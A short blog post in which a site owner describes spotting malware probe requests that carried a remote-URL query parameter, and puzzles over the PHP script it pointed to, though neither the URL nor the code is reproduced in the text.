|Ned Batchelder : Blog | Code | Text | Site|
The script kiddies that couldn't shoot straight
» Home : Blog : March 2008
One of the things I find entertaining about monitoring web sites is to see the trails of malware. Yesterday, there were a few attempts to request pages from our site with a query parameter added on, for example:
I visited that odd URL to see what I could find out, and discovered a plain text file containing PHP code. This is the code (formatted so I could read it):
I'm not sure what the heck is going on here. The script looks like it's trying to accept a command and execute it, except the command is hardcoded to "id". And what good does it do to hit my server with this URL in a ?p= parameter? Is there some vulnerability somewhere so that a server sent this URL will fetch this PHP and execute it? Is this part of a server-based virus? What good does it do if the command is always "id"? So many questions...